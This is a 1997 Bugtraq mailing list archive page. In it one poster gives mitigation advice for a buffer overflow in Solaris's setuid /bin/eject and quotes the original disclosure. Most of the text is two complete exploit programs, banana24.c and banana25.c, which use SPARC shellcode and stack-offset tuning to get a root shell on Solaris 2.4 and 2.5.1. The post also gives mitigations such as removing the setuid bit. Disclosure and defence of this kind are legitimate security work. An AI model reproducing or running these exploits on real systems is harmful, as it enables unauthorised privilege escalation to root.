Bugtraq mailing list archives
Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X -
From: jonathan () CC ODU EDU (Jonathan Sturges)
Date: Thu, 13 Mar 1997 17:44:58 -0500
Hi, I was just testing this on my Solaris 2.5 (SPARC) boxes. And, it appears that if you're running Volume Management (vold), that eject doesn't need to be set-UID anyway. Here's what I did: * chmod 555 /usr/bin/eject (hard-linked to /bin/eject). This immediately protects you from the exploits. * If volume management is running (/usr/ucb/ps -auxww | grep vold), you can still eject BOTH CD's and floppies. * If volume management is NOT running, you CANNOT eject the CD (device permissions are 640), but you CAN still eject a floppy (perms are 666). These permissions seem to be the default permissions on Solaris SPARC 2.5 and 2.5.1. Running the exploits, below, will only pop you a shell as yourself, of course, once /usr/bin/eject has perms. 555. thanks for pointing this hole out!!! -Jonathan On Thu, 13 Mar 1997, Cristian SCHIPOR wrote:
motto: "Mihai Eminescu was a good friend of Ion Creanga" Thu Mar 13 21:01:00 EET 1997 - Romania "Hole in /bin/eject - buffer overflow" I exploited the buffer overflow hole in /bin/eject on Solaris 2.X (who have suid exec bit and is owned by root). The buffer overflow problem appears in an internal function media_find(). The result is: any user can gain root shell. So, to prevent /bin/eject exploit, you have to get out suid-exec bit from /bin/eject (that's very simple) and compile a little program like: main() {execl("/bin/eject","eject","floppy",(char *)0);} That allows your work station ordinary users to eject floppy (thats the main task for eject). I wrote two exploits (Solaris 2.4 & 2.5.1). My exploit for Solaris 2.4 looks a bit ugly - the buffer is two short - but it works. For both exploits argv[1] can change the STACK_OFFSET value (for troubleshotings +- 8 .. +-64 .. the step is 8). The interesting thing about this exploit it worked on some machines where it was installed some stuff to make inofensiv buffer overflows exploits ... Ok you have right down two exploits. For future I'm planing a web page with security stuff for Solaris so try http://www.math.pub.ro/security. Cristian Schipor - Computer Science Faculty - Bucharest - Romania E-mail: skipo () sundy cs pub ro, skipo () math pub ro, skipo () ns ima ro Phone: 401-410.60.88 ------------------------ banana24.c ----------------------------- /* For Solaris 2.4 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define BUF_LENGTH 264 #define EXTRA 36 #define STACK_OFFSET 8 #define SPARC_NOP 0xc013a61c u_char sparc_shellcode[] = "\xc0\x13\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0"/*\x20\x08"*/ ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/eject", "eject", & buf,(char *) 0); perror("execl failed"); } ------------------------- end of banana24.c ------------------------ ------------------------- banana25.c ------------------------------- /* Wrote for Solaris 2.5.1 */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #define BUF_LENGTH 364 #define EXTRA 400 #define STACK_OFFSET 400 #define SPARC_NOP 0xa61cc013 u_char sparc_shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); execl("/bin/eject", "eject", & buf[1],(char *) 0); perror("execl failed"); } ---------------------------- end of banana25.c ------------------------
Current thread:
- Exploit for buffer overflow in /bin/eject - Solaris 2.X - Cristian SCHIPOR (Mar 13)
- Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X - Jonathan Sturges (Mar 13)
- Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X - The Nocturnal Prince (Mar 13)
- Shockwave Security Alert Aleph One (Mar 13)
- Frotpage Extensions and Unix Roland Spatzenegger (Mar 10)
- Re: Frotpage Extensions and Unix M. (Mar 15)
- Re: Shockwave Security Alert Joseph Fish (Mar 14)
- Internet Explorer Bug #4 Aaron Spangler (Mar 14)
- Internet explorer gives your NT password away! Paul Ashton (Mar 14)
- gzip security problem Aleph One (Mar 13)
- Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X - Jonathan Sturges (Mar 13)
- Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X - Casper Dik (Mar 14)
- <Possible follow-ups>
- Re: Exploit for buffer overflow in /bin/eject - Solaris 2.X - Casper Dik (Mar 14)